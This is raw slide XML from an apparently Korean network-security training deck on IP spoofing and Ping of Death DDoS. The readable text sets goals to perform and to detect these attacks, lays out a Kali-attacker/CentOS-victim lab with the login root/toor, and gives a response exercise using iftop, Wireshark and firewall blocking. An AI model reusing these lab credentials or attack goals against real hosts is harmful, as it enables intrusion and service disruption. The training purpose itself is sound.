                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Picture 14" descr="appendix icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECF5A187-5DE1-4A4A-8190-F2DCF30DE9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5354" y="3380506"/>
            <a:ext cx="586243" cy="586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타원 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D901AF2-8468-4E57-A19A-D88B7F554DE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6263266" y="3308419"/>
            <a:ext cx="730420" cy="730420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4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent4">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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36006CD-64B2-4E12-B317-9204AA016FB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178875" y="3313578"/>
            <a:ext cx="4432682" cy="2833758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent4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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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참고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="7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사항</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="7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[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시스템 정보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   &lt;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실습서버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  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계정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: root / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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toor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000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1" name="Picture 4" descr="목표 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF9F62EB-7866-4E3F-8A25-E78C25AC4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559" y="2093753"/>
            <a:ext cx="677306" cy="677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9C59BC4E-1690-4F25-A340-257E8B4DCFAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496054" y="2093753"/>
            <a:ext cx="4432682" cy="836832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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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교육</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="7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목표</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="7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- IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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스푸핑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공격을 수행할 수 있다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en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="7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- IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="7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스푸핑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="7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공격을 탐지하고 대응할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="7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0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EC8135D1-75B8-4CE8-AF52-A075050006C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="585225" y="2090876"/>
            <a:ext cx="730420" cy="730420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6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent6">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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244678E-3E32-4375-A935-CA411D9F8F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6263266" y="2090876"/>
            <a:ext cx="730420" cy="730420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2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="Picture 8" descr="cent os 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B355687-60F8-4A97-9717-DF06525177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703" b="-400"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6394394" y="2199019"/>
            <a:ext cx="499434" cy="500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5E04B7BD-7FFA-4CF6-8896-A184055B3CEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178875" y="2105495"/>
            <a:ext cx="4432682" cy="838800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent2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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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실습</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="7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환경</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="7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sv-SE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Victim : (CentOS 6.6 / 10.10.1.101) + DDWRT(10.10.1.1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="sv-SE" altLang="ko-KR" sz="10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sv-SE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Attacker : (Kali Linux/ 10.10.1.166)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="화살표: 오른쪽 16">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81ED7C86-D7B4-4134-B0EF-1B7A83056B06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="580444" y="596349"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4749B9AA-465F-472F-A9B6-76C8B11FC6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01" t="17407" r="19467" b="25308"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="717195" y="3461755"/>
            <a:ext cx="456918" cy="463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BC968331-6BDC-4EF6-BD34-D24E17DAB382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110"/>
          </a:xfrm>
        </p:grpSpPr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B846F5E4-F54B-48E4-884D-8B11C27E605D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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1A05602-C5D7-4549-9695-4E18B65B363A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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21" name="화살표: 오른쪽 20">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B386215C-A1C0-4471-8A61-6BCBE3FCC914}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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5912779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">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3010DBED-3ABA-4169-8A96-F92BD8C53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sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Training/Unit/Net/13</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 13. DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Ping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>of Death - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>대응</a:t>
            </a:r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6A2CC12-A97B-4DB5-936F-E7C75CBB4AA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496053" y="3328503"/>
            <a:ext cx="4432683" cy="2833758"/>
          </a:xfrm>
          <a:prstGeom prst="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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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대응</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="2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실습</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="7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현재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Ping of Death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공격을 받고 있다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  <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="10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en-US" altLang="ko-KR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iftop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과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Wireshark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로 확인 후 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000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방화벽에서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IP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를 차단하고 로그 기록을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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남기시오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000" dirty="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9A933898-9CDB-4360-99A0-123577882146}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="580444" y="3328504"/>
            <a:ext cx="730420" cy="730420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1">
                    <a:lumMod val="75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5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Picture 14" descr="appendix icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECF5A187-5DE1-4A4A-8190-F2DCF30DE9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5354" y="3380506"/>
            <a:ext cx="586243" cy="586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타원 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D901AF2-8468-4E57-A19A-D88B7F554DE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6263266" y="3308419"/>
            <a:ext cx="730420" cy="730420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4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent4">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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36006CD-64B2-4E12-B317-9204AA016FB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178875" y="3313578"/>
            <a:ext cx="4432682" cy="2833758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent4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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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참고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="7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사항</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="7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[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시스템 정보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   &lt;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실습서버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  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계정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: root / toor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Picture 4" descr="목표 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF9F62EB-7866-4E3F-8A25-E78C25AC4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559" y="2093753"/>
            <a:ext cx="677306" cy="677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9C59BC4E-1690-4F25-A340-257E8B4DCFAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496054" y="2093753"/>
            <a:ext cx="4432682" cy="836832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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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교육</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="7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목표</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="7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en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="9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000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="9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000" kern="0" spc="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="9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PoD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="9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000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="9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공격을 수행할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="9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-  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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PoD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공격을 탐지하고 대응할 수 있다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000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EC8135D1-75B8-4CE8-AF52-A075050006C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="585225" y="2090876"/>
            <a:ext cx="730420" cy="730420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6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent6">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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244678E-3E32-4375-A935-CA411D9F8F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6263266" y="2090876"/>
            <a:ext cx="730420" cy="730420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2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="Picture 8" descr="cent os 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B355687-60F8-4A97-9717-DF06525177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703" b="-400"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6394394" y="2199019"/>
            <a:ext cx="499434" cy="500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5E04B7BD-7FFA-4CF6-8896-A184055B3CEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178875" y="2105495"/>
            <a:ext cx="4432682" cy="838800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent2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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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실습</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="7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환경</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="7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sv-SE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Attacker(Kali linux / 10.10.1.166)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="sv-SE" altLang="ko-KR" sz="10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lang="sv-SE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Victim(CentOS 6.4 / 10.10.1.101)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="화살표: 오른쪽 16">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81ED7C86-D7B4-4134-B0EF-1B7A83056B06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="580444" y="596349"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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BC968331-6BDC-4EF6-BD34-D24E17DAB382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110"/>
          </a:xfrm>
        </p:grpSpPr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B846F5E4-F54B-48E4-884D-8B11C27E605D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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1A05602-C5D7-4549-9695-4E18B65B363A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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21" name="화살표: 오른쪽 20">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B386215C-A1C0-4471-8A61-6BCBE3FCC914}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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2" name="Picture 2" descr="보안 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1468F5E4-2EBF-4951-ADA0-008B174065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74" t="12467" r="11967" b="12532"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="662681" y="3412409"/>
            <a:ext cx="565945" cy="562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14635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화살표: 오른쪽 8">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DC0363-5748-4238-A24E-3E0F461FCB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="134367" y="97585"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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2DF244-1E45-44A0-B32E-616FEC167CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="368998"/>
            <a:ext cx="5616792" cy="6120000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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> [setup]</a:t>
            </a:r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r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>탐지 항목</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
